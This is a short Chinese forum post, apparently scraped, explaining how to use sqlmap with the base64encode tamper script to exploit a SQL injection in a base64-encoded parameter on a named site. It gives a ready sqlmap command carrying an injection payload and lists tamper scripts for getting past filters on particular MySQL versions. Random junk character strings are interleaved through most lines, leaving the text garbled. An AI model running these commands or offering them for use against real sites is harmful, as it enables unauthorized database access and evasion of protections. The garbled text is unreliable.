WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?/ X! K" g! ~9 S
& M" I$ C f1 G d; C
sqlmap的tamper里有个base64encode.py
, v. V5 S- Y. A* {1 Z! B5 `- d$ k. g3 L% F
使用如下
1 r* Y) q6 [( ? [6 r/ B
q @5 L m' }$ L5 |* \sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs9 G7 t, G7 K. r
6 Q9 s7 L% O' z" v- t
/ k: m6 z( {- l' S7 Y; ?1 h5 Y
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
% h8 p3 o* L2 G2 X
9 T- Y- Z; v& l5 D3 S" z3 s其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
4 q, Q: a6 R2 v4 @4 P8 J
A4 c9 r7 x% l5 l. U$ i6 ispace2hash.py ,对于MYSQL数据库 4.0, 5.0注入
# G. b, Z+ x2 _$ {/ Fspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入4 J% c* h8 V+ Z7 B( V: h
首先确定目标数据库版本,然后选择相应的脚本。3 _5 b3 V7 d' \- r; c J8 V
-v 3 --batch --tamper "space2hash.py"
% E9 ^/ W" y3 ^+ W' r* s
; k$ g$ h5 ~' _* p, u还有其他一些插件:! ]% @2 N; l9 h- H4 V: F$ E
encodes编码 ——charencode.py
$ _$ G9 M, f5 ]% G/ x: Ebase64编码 —— base64encode.py8 r- h; N1 o( |
替换空格和关键字 —— halfversionedmorekeywords.py
9 F, C+ k) X3 E* K6 b4 |8 o | 0 C: B7 l* x( l# ?2 e( `* }7 @
% D C2 q: ^1 @' d2 E" Z. A5 m/ a
6 r* z2 q7 k3 \8 M, C* S/ E# v2 `% B) L* w8 j; J
|